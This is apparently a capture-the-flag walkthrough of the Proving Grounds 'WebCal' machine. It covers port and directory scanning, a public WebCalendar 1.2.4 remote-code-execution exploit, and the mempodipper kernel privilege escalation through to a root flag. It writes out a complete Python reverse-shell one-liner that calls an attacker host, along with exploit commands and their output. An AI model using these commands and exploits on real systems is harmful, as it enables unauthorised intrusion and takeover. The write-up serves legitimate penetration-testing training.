Logo
Overview

PG: WebCal | Walkthrough

November 25, 2021
2 min read
PG/Machines Boot2Root OSCP/Prep writeups CVE/WebCalendar mempodipper

Enumeration

As usual, start with a Nmap scan

Terminal window
$ nmap $ip -p21,22,25,53,80 -sVC --version-all


PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
22/tcp open  ssh     OpenSSH 5.8p1 Debian 7ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 5b:b4:3f:ad:ac:70:b3:6f:70:db:de:72:11:03:d7:1d (DSA)
|   2048 13:dc:ff:d4:03:51:a5:9f:0c:05:33:82:f0:4a:dd:21 (RSA)
|_  256 fe:be:7f:91:5c:5e:64:78:0b:35:e4:73:1f:01:f5:a1 (ECDSA)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ucal.local, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2021-11-25T19:56:51+00:00; +5h00m01s from scanner time.
| ssl-cert: Subject: commonName=ucal.local
| Not valid before: 2013-01-14T10:28:18
|_Not valid after:  2023-01-12T10:28:18
53/tcp open  domain  ISC BIND 9.7.3
| dns-nsid:
|_  bind.version: 9.7.3
80/tcp open  http    Apache httpd 2.2.20 ((Ubuntu))
|_http-title: Construction Page
|_http-server-header: Apache/2.2.20 (Ubuntu)

Web Fuzzing

Terminal window
$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q  -x php,html,txt
/index                (Status: 200) [Size: 5105]
/index.html           (Status: 200) [Size: 5105]
/index.html           (Status: 200) [Size: 5105]
/resources            (Status: 301) [Size: 318] [--> http://192.168.69.37/resources/]
/send.php             (Status: 200) [Size: 3168]
/send                 (Status: 200) [Size: 3168]
/server-status        (Status: 403) [Size: 294]
/webcalendar          (Status: 301) [Size: 320] [--> http://192.168.69.37/webcalendar/]

Explotation

Initial Exploitation

  • Intercept response when going to /webcalendar/
  • change the response to 200 OK
  • searchsploit webcalendar 1.2.4
Terminal window
$ searchsploit -m php/webapps/18775.php
$ php 18775.php $ip /webcalendar/


+-------------------------------------------------------------+
| WebCalendar <= 1.2.4 Remote Code Executionn Exploit by EgiX |
+-------------------------------------------------------------+


webcalendar-shell# python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.69",443));os.dup2(s.fileno(),0);os.dup2(s.fi
leno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Privilege Escalation

Mempodipper Exploit | Exploit-DB

Terminal window
www-data@ucal:/var/www$ uname -a
Linux ucal 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux


www-data@ucal:/tmp$ chmod +x mempodipper
www-data@ucal:/tmp$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================


[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/18835/mem in child.
[+] Sending fd 7 to parent.
[+] Received fd at 7.
[+] Assigning fd 7 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/proof.txt
46bbfb8761dc14181fa0bebf220c7540